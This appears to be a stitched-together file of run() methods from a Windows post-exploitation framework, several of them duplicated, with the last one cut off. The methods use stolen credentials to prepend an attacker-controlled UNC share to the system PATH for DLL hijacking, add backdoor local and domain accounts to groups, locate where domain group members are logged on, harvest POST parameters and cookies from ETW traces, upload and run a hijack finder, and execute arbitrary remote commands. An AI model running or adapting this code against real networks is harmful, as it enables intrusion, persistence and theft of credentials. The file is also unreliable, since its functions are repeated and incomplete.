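    def run(self):
        """Prepend a UNC share on ``lhost`` to the system PATH of every target.

        For each host in ``self.targets`` the machine-wide ``Path`` value is
        read with ``reg query``, rewritten with ``\\\\<lhost>\\system\\;`` in
        front of the current value, and ``CWDIllegalInDllSearch`` is set to 0.
        For every value that was actually changed a cleanup line restoring the
        original PATH (and setting ``CWDIllegalInDllSearch`` back to 2) is
        appended to ``self.cleanup``; per-target status lines go to
        ``self.output``.

        Uses the first credential pair in ``self.creds`` and the
        ``trigger_method`` / ``lhost`` required options.  A host whose PATH
        cannot be read is skipped instead of being written with an empty PATH.

        NOTE: status and cleanup lines embed the password in plaintext, so
        ``self.output`` and ``self.cleanup`` must be handled as sensitive data.
        """
        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]

        envKey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
        pathCMD = "reg query \"" + envKey + "\" /v Path"
        successMarker = "The operation completed successfully."
        pathSet = False

        for target in self.targets:

            # reg.exe to get the current path
            pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)

            # expected layout: a blank line, the "HKEY_..." key line, then
            # "    Path    REG_EXPAND_SZ    <value>"; the value is everything
            # after the type column, kept verbatim so internal spacing survives
            # (an empty or short result used to raise IndexError here)
            existingPath = ""
            parts = pathResult.split("\r\n")
            if len(parts) > 2 and parts[1].startswith("HKEY"):
                regParts = parts[2].split(None, 2)
                if len(regParts) == 3:
                    existingPath = regParts[2].strip()

            if existingPath == "":
                # never write an empty PATH to the host: skip it entirely
                print(helpers.color(" [!] Error: No path found\n", warning=True))
                self.output += "[!] No PATH value found using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue

            newPath = "\\\\" + lhost + "\\system\\;" + existingPath
            regCMD = "REG ADD \"" + envKey + "\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\""
            regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)

            if regResult == "":
                self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue
            if successMarker not in regResult:
                self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue

            pathSet = True
            self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n"

            # register the restore of the original PATH before touching anything else
            cleanupCMD = "REG ADD \"" + envKey + "\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\""
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            # value 0 allows UNC loading in %PATH%; the cleanup below sets 2 to disable it again
            regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
            regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod)

            # only report (and schedule cleanup for) a change that actually succeeded
            if successMarker in regResult2:
                self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n"
            else:
                self.output += "[!] reg command to allow UNC loading failed using creds '" + username + ":" + password + "' on : " + target + "\n"

        # point at the monitor only when at least one PATH was actually rewritten
        if pathSet:
            self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"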
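    def run(self):
        """Report members of a domain group that have a process or session on each target.

        For every host in ``self.targets`` the membership of the ``group``
        option is read with ``net group "<group>" /domain`` (run on the host so
        the lookup happens in that host's domain), then ``tasklist /V /FO CSV``
        and ``qwinsta`` output from the same host is searched for each member
        name.  Hits are appended to ``self.output`` and echoed to the console.
        Uses the first credential pair; the trigger method is fixed to winexe.

        Matching is a plain case-insensitive substring test, so a short name
        can match inside a longer one; treat hits as leads to verify.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]
        triggerMethod = "winexe"

        # net.exe command to list the domain group's members
        command = "net group \"%s\" /domain" % (group)

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            # sanity check the listing: member names follow a "-----" separator
            # line; without it (empty result, error text) there is nothing to
            # hunt for and the old slice silently yielded no names
            marker = result.find("-----")
            if marker == -1:
                self.output += "[!] No group listing for '%s' returned using creds '%s:%s' on %s\n" % (group, username, password, target)
                continue

            # drop the separator line and the trailing blank/status lines, then
            # split the remaining rows into individual (lower-cased) names
            nameParts = result[marker:].split("\r\n")[1:-3]
            targetUsernames = [name for part in nameParts for name in part.lower().split()]

            # process and session lists on the host, lower-cased once for matching
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod).lower()
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod).lower()

            print("")

            for u in targetUsernames:
                if u in taskListResult:
                    self.output += "[*] User '%s\\%s' has a process on %s\n" % (group, u, target)
                    print(helpers.color("\n [*] User '%s\\%s' has a process on %s!" % (group, u, target)))
                    time.sleep(1)
                if u in sessionsResult:
                    self.output += "[*] User '%s\\%s' has a session on %s\n" % (group, u, target)
                    print(helpers.color(" [*] User '%s\\%s' has a session on %s!" % (group, u, target)))
                    time.sleep(1)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"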
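    def run(self):
        """Prepend a UNC share on ``lhost`` to the system PATH of every target.

        For each host in ``self.targets`` the machine-wide ``Path`` value is
        read with ``reg query``, rewritten with ``\\\\<lhost>\\system\\;`` in
        front of the current value, and ``CWDIllegalInDllSearch`` is set to 0.
        For every value that was actually changed a cleanup line restoring the
        original PATH (and setting ``CWDIllegalInDllSearch`` back to 2) is
        appended to ``self.cleanup``; per-target status lines go to
        ``self.output``.

        Uses the first credential pair in ``self.creds`` and the
        ``trigger_method`` / ``lhost`` required options.  A host whose PATH
        cannot be read is skipped instead of being written with an empty PATH.

        NOTE: status and cleanup lines embed the password in plaintext, so
        ``self.output`` and ``self.cleanup`` must be handled as sensitive data.
        """
        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        lhost = self.required_options["lhost"][0]

        envKey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"
        pathCMD = "reg query \"" + envKey + "\" /v Path"
        successMarker = "The operation completed successfully."
        pathSet = False

        for target in self.targets:

            # reg.exe to get the current path
            pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod)

            # expected layout: a blank line, the "HKEY_..." key line, then
            # "    Path    REG_EXPAND_SZ    <value>"; the value is everything
            # after the type column, kept verbatim so internal spacing survives
            # (an empty or short result used to raise IndexError here)
            existingPath = ""
            parts = pathResult.split("\r\n")
            if len(parts) > 2 and parts[1].startswith("HKEY"):
                regParts = parts[2].split(None, 2)
                if len(regParts) == 3:
                    existingPath = regParts[2].strip()

            if existingPath == "":
                # never write an empty PATH to the host: skip it entirely
                print(helpers.color(" [!] Error: No path found\n", warning=True))
                self.output += "[!] No PATH value found using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue

            newPath = "\\\\" + lhost + "\\system\\;" + existingPath
            regCMD = "REG ADD \"" + envKey + "\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\""
            regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod)

            if regResult == "":
                self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue
            if successMarker not in regResult:
                self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n"
                continue

            pathSet = True
            self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n"

            # register the restore of the original PATH before touching anything else
            cleanupCMD = "REG ADD \"" + envKey + "\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\""
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"

            # value 0 allows UNC loading in %PATH%; the cleanup below sets 2 to disable it again
            regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0"
            regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod)

            # only report (and schedule cleanup for) a change that actually succeeded
            if successMarker in regResult2:
                self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n"
            else:
                self.output += "[!] reg command to allow UNC loading failed using creds '" + username + ":" + password + "' on : " + target + "\n"

        # point at the monitor only when at least one PATH was actually rewritten
        if pathSet:
            self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"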
    def run(self):
        """Create a local user on every target and add it to a local group.

        ``net user <user> <pass> /add`` is run through the configured trigger
        method; on success a ``net user <user> /delete`` cleanup line is
        recorded in ``self.cleanup`` and ``net localgroup <group> <user> /add``
        is attempted.  One status line per step is appended to ``self.output``.
        Uses the first credential pair and the ``trigger_method`` / ``user`` /
        ``pass`` / ``group`` required options.

        NOTE: the new account's password and the operator credentials are
        written in plaintext to ``self.output`` and ``self.cleanup``.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # the account to create is the same for every target
        userToAdd = self.required_options["user"][0]
        passToAdd = self.required_options["pass"][0]
        groupToAdd = self.required_options["group"][0]

        # command to add the user:password to the machine
        userAddCommand = "net user %s %s /add" % (userToAdd, passToAdd)

        # command to add the user to the specified localgroup
        groupAddCommand = "net localgroup %s %s /add" % (groupToAdd, userToAdd)

        credsTag = username + ":" + password
        okMarker = "The command completed successfully"

        for target in self.targets:

            # execute the user add command and get the result
            userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod)

            if userAddResult == "":
                self.output += "[!] No result file, user add '%s:%s' failed using creds '%s' on : %s\n" % (userToAdd, passToAdd, credsTag, target)
                continue

            if okMarker not in userAddResult:
                self.output += "[!] User add '%s:%s' failed using creds '%s' on : %s\n" % (userToAdd, passToAdd, credsTag, target)
                continue

            self.output += "[*] User '%s:%s' successfully added using creds '%s' on %s\n" % (userToAdd, passToAdd, credsTag, target)

            # cleanup -> delete the user from the system
            cleanupCMD = "net user %s /delete" % (userToAdd)
            self.cleanup += "|".join(["executeCommand", target, username, password, cleanupCMD, triggerMethod]) + "\n"

            # the user exists now, so continue to the group add
            groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)

            if groupAddResult == "":
                self.output += "[!] No result file, user add of user '%s' to localgroup '%s' failed using creds '%s' on : %s\n" % (userToAdd, groupToAdd, credsTag, target)
            elif okMarker in groupAddResult:
                self.output += "[*] User '%s' successfully added to localgroup '%s' using creds '%s' on %s\n" % (userToAdd, groupToAdd, credsTag, target)
            else:
                self.output += "[!] User add '%s' to localgroup '%s' failed using creds '%s' on : %s\n" % (userToAdd, groupToAdd, credsTag, target)
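    def run(self):
        """Report members of a domain group that have a process or session on each target.

        For every host in ``self.targets`` the membership of the ``group``
        option is read with ``net group "<group>" /domain`` (run on the host so
        the lookup happens in that host's domain), then ``tasklist /V /FO CSV``
        and ``qwinsta`` output from the same host is searched for each member
        name.  Hits are appended to ``self.output`` and echoed to the console.
        Uses the first credential pair; the trigger method is fixed to winexe.

        Matching is a plain case-insensitive substring test, so a short name
        can match inside a longer one; treat hits as leads to verify.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        group = self.required_options["group"][0]
        triggerMethod = "winexe"

        # net.exe command to list the domain group's members
        command = "net group \"%s\" /domain" % (group)

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            # sanity check the listing: member names follow a "-----" separator
            # line; without it (empty result, error text) there is nothing to
            # hunt for and the old slice silently yielded no names
            marker = result.find("-----")
            if marker == -1:
                self.output += "[!] No group listing for '%s' returned using creds '%s:%s' on %s\n" % (group, username, password, target)
                continue

            # drop the separator line and the trailing blank/status lines, then
            # split the remaining rows into individual (lower-cased) names
            nameParts = result[marker:].split("\r\n")[1:-3]
            targetUsernames = [name for part in nameParts for name in part.lower().split()]

            # process and session lists on the host, lower-cased once for matching
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod).lower()
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod).lower()

            print("")

            for u in targetUsernames:
                if u in taskListResult:
                    self.output += "[*] User '%s\\%s' has a process on %s\n" % (group, u, target)
                    print(helpers.color("\n [*] User '%s\\%s' has a process on %s!" % (group, u, target)))
                    time.sleep(1)
                if u in sessionsResult:
                    self.output += "[*] User '%s\\%s' has a session on %s\n" % (group, u, target)
                    print(helpers.color(" [*] User '%s\\%s' has a session on %s!" % (group, u, target)))
                    time.sleep(1)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"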
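    def run(self):
        """Extract the domain SID from ``whoami /user`` on every target.

        ``whoami /user`` prints the account's SID as ``<domain SID>-<RID>``;
        the last component is dropped to obtain the domain SID, which is echoed
        to the console and appended to ``self.output`` together with the
        credentials used.  Uses the first credential pair; the trigger method
        is fixed to wmis.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = "wmis"
        command = "whoami /user"

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, trigger_method)

            if result == "":
                # the previous message interpolated an undefined name (``group``) and raised NameError
                self.output += "[!] No result file, query for domain sid failed on " + target + "\n"
                continue

            sid = ""
            for line in result.split("\n"):
                # the SID is the field starting with "S-"; don't assume the
                # account column is a single whitespace-free token
                sidTokens = [tok for tok in line.split() if tok.startswith("S-")]
                if not sidTokens:
                    continue
                # extract the domain sid by dropping the trailing RID
                sid = "-".join(sidTokens[-1].split("-")[:-1])
                print(helpers.color("\n\n [*] Domain sid: " + sid))
                time.sleep(2)
                self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n"

            if sid == "":
                self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"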
    def run(self):
        """Check whether PowerShell is installed on each target via the registry.

        Queries ``HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install`` through
        the configured trigger method and appends one status line per target to
        ``self.output`` (``0x1`` in the output means installed, ``0x0`` not
        installed).  Uses the first credential pair and the ``trigger_method``
        required option.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # reg.exe command to detect if powershell is installed
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)
            where = "using creds '" + username + ":" + password + "' on : " + target + "\n"

            # order matters: an error marker or an empty result must win over
            # the substring checks on the registry value
            if result.startswith("error:"):
                msg = "[!] Error '" + result + "' in detecting powershell "
            elif result == "":
                msg = "[!] No result file, detect PowerShell failed "
            elif "0x1" in result:
                msg = "[*] PowerShell detected "
            elif "0x0" in result:
                msg = "[*] PowerShell not detected "
            else:
                print("result: " + result)
                msg = "[!] Error in detecting PowerShell "

            self.output += msg + where
    def run(self):
        """Run finddllhijack.exe on each target and save its output locally.

        The binary under ``settings.VEIL_PILLAGE_PATH/data/misc`` is copied to
        ``C:\\Windows\\Temp`` over the C$ share, executed through the configured
        trigger method (with a 5 second pause for results), then deleted from
        the host.  Output is stored with ``helpers.saveModuleFile`` and a status
        line is appended to ``self.output``.  Uses the first credential pair
        and the ``trigger_method`` required option.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # local copy of the binary and where it lands on the host
        localExe = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        remoteDir = "\\Windows\\Temp\\"
        remoteExe = "C:" + remoteDir + "finddllhijack.exe"

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", remoteDir, localExe)

            # execute finddllhijack and get the results
            out = command_methods.executeResult(target, username, password, remoteExe, triggerMethod, pause=5)

            # remove the uploaded binary again
            command_methods.executeCommand(target, username, password, "del " + remoteExe, triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

            if out == "":
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
            else:
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
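    def run(self):
        """Extract the domain SID from ``whoami /user`` on every target.

        ``whoami /user`` prints the account's SID as ``<domain SID>-<RID>``;
        the last component is dropped to obtain the domain SID, which is echoed
        to the console and appended to ``self.output`` together with the
        credentials used.  Uses the first credential pair; the trigger method
        is fixed to wmis.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = "wmis"
        command = "whoami /user"

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, trigger_method)

            if result == "":
                # the previous message interpolated an undefined name (``group``) and raised NameError
                self.output += "[!] No result file, query for domain sid failed on " + target + "\n"
                continue

            sid = ""
            for line in result.split("\n"):
                # the SID is the field starting with "S-"; don't assume the
                # account column is a single whitespace-free token
                sidTokens = [tok for tok in line.split() if tok.startswith("S-")]
                if not sidTokens:
                    continue
                # extract the domain sid by dropping the trailing RID
                sid = "-".join(sidTokens[-1].split("-")[:-1])
                print(helpers.color("\n\n [*] Domain sid: " + sid))
                time.sleep(2)
                self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n"

            if sid == "":
                self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"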
    def run(self):
        """Create a domain user from every target and add it to a domain group.

        ``net user <user> <pass> /add /domain`` is run through the configured
        trigger method; on success a ``net user <user> /delete /domain``
        cleanup line is recorded in ``self.cleanup`` and
        ``net group <group> <user> /add /domain`` is attempted.  One status
        line per step is appended to ``self.output``.  Uses the first
        credential pair and the ``trigger_method`` / ``user`` / ``pass`` /
        ``group`` required options.

        NOTE: the new account's password and the operator credentials are
        written in plaintext to ``self.output`` and ``self.cleanup``.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # the account to create is the same for every target
        userToAdd = self.required_options["user"][0]
        passToAdd = self.required_options["pass"][0]
        groupToAdd = self.required_options["group"][0]

        # command to add the user:password to the domain
        userAddCommand = "net user %s %s /add /domain" % (userToAdd, passToAdd)

        # command to add the user to the specified domain group
        groupAddCommand = "net group %s %s /add /domain" % (groupToAdd, userToAdd)

        credsTag = username + ":" + password
        okMarker = "The command completed successfully"

        for target in self.targets:

            # execute the user add command and get the result
            userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod)

            if userAddResult == "":
                self.output += "[!] No result file, domain user add '%s:%s' failed using creds '%s' on : %s\n" % (userToAdd, passToAdd, credsTag, target)
                continue

            if okMarker not in userAddResult:
                self.output += "[!] Domain user add '%s:%s' failed using creds '%s' on : %s\n" % (userToAdd, passToAdd, credsTag, target)
                continue

            self.output += "[*] Domain user '%s:%s' successfully added using creds '%s' on %s\n" % (userToAdd, passToAdd, credsTag, target)

            # cleanup -> delete the user from the domain
            cleanupCMD = "net user %s /delete /domain" % (userToAdd)
            self.cleanup += "|".join(["executeCommand", target, username, password, cleanupCMD, triggerMethod]) + "\n"

            # the user exists now, so continue to the group add
            groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod)

            if groupAddResult == "":
                self.output += "[!] No result file, domain user add of user '%s' to group '%s' failed using creds '%s' on : %s\n" % (userToAdd, groupToAdd, credsTag, target)
            elif okMarker in groupAddResult:
                self.output += "[*] Domain user '%s' successfully added to group '%s' using creds '%s' on %s\n" % (userToAdd, groupToAdd, credsTag, target)
            else:
                self.output += "[!] Domain user add '%s' to group '%s' failed using creds '%s' on : %s\n" % (userToAdd, groupToAdd, credsTag, target)
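    def run(self):
        """Check each target's process and session lists for the given user name(s).

        The ``user`` required option is either a path to a local file with one
        user name per line or a single user name.  ``tasklist /V /FO CSV`` and
        ``qwinsta`` are run on every target and each name is searched for
        (case-insensitively) in their output; hits are appended to
        ``self.output``.  Uses the first credential pair and the
        ``trigger_method`` required option.

        Matching is a plain substring test, so a short name can match inside a
        longer one; treat hits as leads to verify.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        userOption = self.required_options["user"][0]

        # a file argument gives one name per line; blank lines are dropped
        # because an empty string is a substring of everything and would
        # report every host as a hit
        if os.path.exists(userOption):
            with open(userOption) as f:
                targetUsernames = [line.strip() for line in f if line.strip()]
        # otherwise we have just a single name
        else:
            targetUsernames = [userOption]

        for target in self.targets:

            # process and session lists on the host, lower-cased once for matching
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod).lower()
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod).lower()

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                needle = u.lower()
                if needle in taskListResult:
                    self.output += "[*] User '%s' has process on %s\n" % (u, target)
                if needle in sessionsResult:
                    self.output += "[*] User '%s' has session on %s\n" % (u, target)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"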
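    def run(self):
        """Check each target's process and session lists for the given user name(s).

        The ``user`` required option is either a path to a local file with one
        user name per line or a single user name.  ``tasklist /V /FO CSV`` and
        ``qwinsta`` are run on every target and each name is searched for
        (case-insensitively) in their output; hits are appended to
        ``self.output``.  Uses the first credential pair and the
        ``trigger_method`` required option.

        Matching is a plain substring test, so a short name can match inside a
        longer one; treat hits as leads to verify.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        userOption = self.required_options["user"][0]

        # a file argument gives one name per line; blank lines are dropped
        # because an empty string is a substring of everything and would
        # report every host as a hit
        if os.path.exists(userOption):
            with open(userOption) as f:
                targetUsernames = [line.strip() for line in f if line.strip()]
        # otherwise we have just a single name
        else:
            targetUsernames = [userOption]

        for target in self.targets:

            # process and session lists on the host, lower-cased once for matching
            taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod).lower()
            sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod).lower()

            # for each username in our target list, see if they show up in the queried results
            for u in targetUsernames:
                needle = u.lower()
                if needle in taskListResult:
                    self.output += "[*] User '%s' has process on %s\n" % (u, target)
                if needle in sessionsResult:
                    self.output += "[*] User '%s' has session on %s\n" % (u, target)

        # if we have no results, add message to the output
        if self.output == "":
            self.output = "[!] No users found\n"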
    def run(self):
        """Run the ``command`` option on every target and collect its output.

        Each non-empty result is appended to ``self.output`` under a header
        naming the command, the credentials used and the host; targets that
        return nothing are skipped without a message.  Uses the first
        credential pair and the ``trigger_method`` / ``command`` required
        options.

        NOTE: the header embeds the password in plaintext.
        """
        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        command = self.required_options["command"][0]

        for target in self.targets:
            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                continue

            self.output += "".join([
                "[*] Results for '", command, "' using creds '", username, ":", password, "' on ", target, " : \n",
                result,
                "\n\n",
            ])
    def run(self):
        """Collect ETW trace entries matching the ``flag`` option from each target.

        Stops the ``Status32`` trace session, filters the trace log at
        ``C:\\Windows\\Temp\\status32.etl`` with wevtutil for either POST
        parameters or added cookies, deletes the .etl file and stores any
        matching lines with ``helpers.saveModuleFile``.  One status line per
        target is appended to ``self.output``.  Uses the first credential pair
        and the ``trigger_method`` / ``flag`` required options.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        flagOption = self.required_options["flag"][0]

        # the flag is the same for every target: resolve the search string and
        # the output file name once
        if flagOption.lower() == "post":
            flag, moduleFile = "POST", "post_params.txt"
        else:
            flag, moduleFile = "cookie added", "cookies.txt"

        stopCMD = "logman stop Status32 -ets"
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\""
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        credsTag = username + ":" + password

        for target in self.targets:

            # stop the ETW session
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)

            # query the trace for the flag; the 20 second pause gives the trace
            # time to flush and parse (increase it if errors show up)
            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)

            # delete the trace file
            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)

            if parseResult == "":
                self.output += "[!] No ETW results for %s using creds '%s' on : %s\n" % (flag, credsTag, target)
                continue

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for %s using creds '%s' on %s stored at %s\n" % (flag, credsTag, target, saveFile)
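    def run(self):
        """List domain user accounts from every target with ``net users /domain``.

        The raw command output is appended to ``self.output`` per target; an
        empty result is reported as a failure.  Uses the first credential pair;
        the trigger method is fixed to winexe.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = "winexe"

        # net.exe command to list the domain's user accounts (run on each host
        # so it resolves against that host's domain)
        command = "net users /domain"

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                # "[*]" marks success like the other modules (was "[!]" with a typo)
                self.output += "[*] Query for domain users successful on " + target + ":\n"
                self.output += result + "\n"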
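    def run(self):
        """List domain user accounts from every target with ``net users /domain``.

        The raw command output is appended to ``self.output`` per target; an
        empty result is reported as a failure.  Uses the first credential pair;
        the trigger method is fixed to winexe.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = "winexe"

        # net.exe command to list the domain's user accounts (run on each host
        # so it resolves against that host's domain)
        command = "net users /domain"

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)

            if result == "":
                self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                # "[*]" marks success like the other modules (was "[!]" with a typo)
                self.output += "[*] Query for domain users successful on " + target + ":\n"
                self.output += result + "\n"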
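    def run(self):
        """Terminate all powershell.exe processes on every target.

        Runs ``taskkill /f /im powershell.exe`` through the configured trigger
        method and appends one status line per target to ``self.output``.
        Uses the first credential pair and the ``trigger_method`` required
        option.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # kill all powershell processes
        killCMD = "taskkill /f /im powershell.exe"

        for target in self.targets:

            # execute the command on the host and get the output
            out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)

            if "SUCCESS" in out:
                self.output += "[*] Powershell processes terminated using creds '" + username + ":" + password + "' on " + target + "\n"
            else:
                # "[!]" marks failure like the other modules; presumably this
                # branch is also taken when no powershell.exe was running
                self.output += "[!] Powershell processes failed to terminate using creds '" + username + ":" + password + "' on " + target + "\n"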
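    def run(self):
        """Disable Remote Desktop on every target by setting ``fDenyTSConnections`` to 1.

        The registry write is done with reg.exe through the configured trigger
        method and one status line per target is appended to ``self.output``.
        Uses the first credential pair and the ``trigger_method`` required
        option.
        """
        # assume single set of credentials (take the first one)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # disable RDP command
        rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

        for target in self.targets:

            # execute the RDP disable command and get the result
            rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)

            if rdpResult == "":
                self.output += "[!] No result file, RDP disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in rdpResult:
                self.output += "[*] RDP successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            else:
                # a non-empty result without the success marker used to go unreported
                self.output += "[!] Error in disabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"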
    def run(self):
        """Enable UAC on every target by setting ``EnableLUA`` to 1 with reg.exe.

        One status line per target is appended to ``self.output`` depending on
        whether the reg.exe output was empty, contained the success marker, or
        anything else.  Uses the first credential pair and the
        ``trigger_method`` required option.
        """
        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # reg.exe command to enable UAC
        command = "reg ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f"
        credsTag = username + ":" + password

        for target in self.targets:

            result = command_methods.executeResult(target, username, password, command, triggerMethod)
            where = " using creds '" + credsTag + "' on : " + target + "\n"

            if result == "":
                msg = "[!] No result file, UAC enable failed"
            elif "The operation completed successfully" in result:
                msg = "[*] UAC successfully enabled"
            else:
                msg = "[!] Error in enabling UAC"

            self.output += msg + where
    def run(self):
        """Check whether PowerShell actually runs on each target.

        Instead of querying the install key, a trivial script (``$a=42;$a``)
        is executed remotely and the stripped output is compared with
        ``42``; the verdict is appended to ``self.output``.
        """
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]

